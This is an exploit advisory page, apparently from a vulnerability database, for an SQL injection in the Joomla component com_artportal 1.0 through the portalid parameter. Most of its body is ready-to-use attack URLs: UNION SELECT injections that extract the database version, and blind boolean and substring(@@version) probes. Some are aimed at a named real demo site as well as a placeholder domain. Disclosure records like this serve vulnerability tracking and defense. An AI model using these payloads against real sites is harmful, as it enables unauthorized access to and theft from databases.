Joomla Component com_artportal 1.0 (portalid) SQL Injection Vulns

2009-09-03 / 2009-09-04
Credit: 599eme Man
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# [+] Joomla Compenent Com_artportal (portalid) Remote SQL Injection Vulnerabilities # [+] Software : Joomla Compenent Com_artportal # [+] Author : 599eme Man # [+] Contact : Flouf@live.fr # [+] Thanks : Moudi, Kim, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell... # #[------------------------------------------------------------------------------------] # # [+] Vulnerability # # [+] SQL # # - http://www.site.com/index.php?option=com_artportal&portalid=1 union all select 1,2,3,4,5,6,version(),8,9-- # # [+] Demo # # - http://demo.artetics.com/index.php?option=com_artportal&portalid=1%20union%20all%20select%201,2,3,4,5,6,version(),8,9-- # # [+] Blind SQL # # - http://www.site.com/index.php?option=com_artportal&portalid=1 and 1=2 => False # - http://www.site.com/index.php?option=com_artportal&portalid=1 and and 1=1 => True # # - http://www.site.com/index.php?option=com_artportal&portalid=1 and substring(@@version,1,1)=4 => False # - http://www.site.com/index.php?option=com_artportal&portalid=1 and substring(@@version,1,1)=5 => True # # [+] Demo # # - http://demo.artetics.com/index.php?option=com_artportal&portalid=1 and 1=2 => False # - http://demo.artetics.com/index.php?option=com_artportal&portalid=1 and 1=1 => True # # - http://demo.artetics.com/index.php?option=com_artportal&portalid=1 and substring(@@version,1,1)=4 => False # - http://demo.artetics.com/index.php?option=com_artportal&portalid=1 and substring(@@version,1,1)=5 => True # ###############################

References:

http://www.milw0rm.com/exploits/9563


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top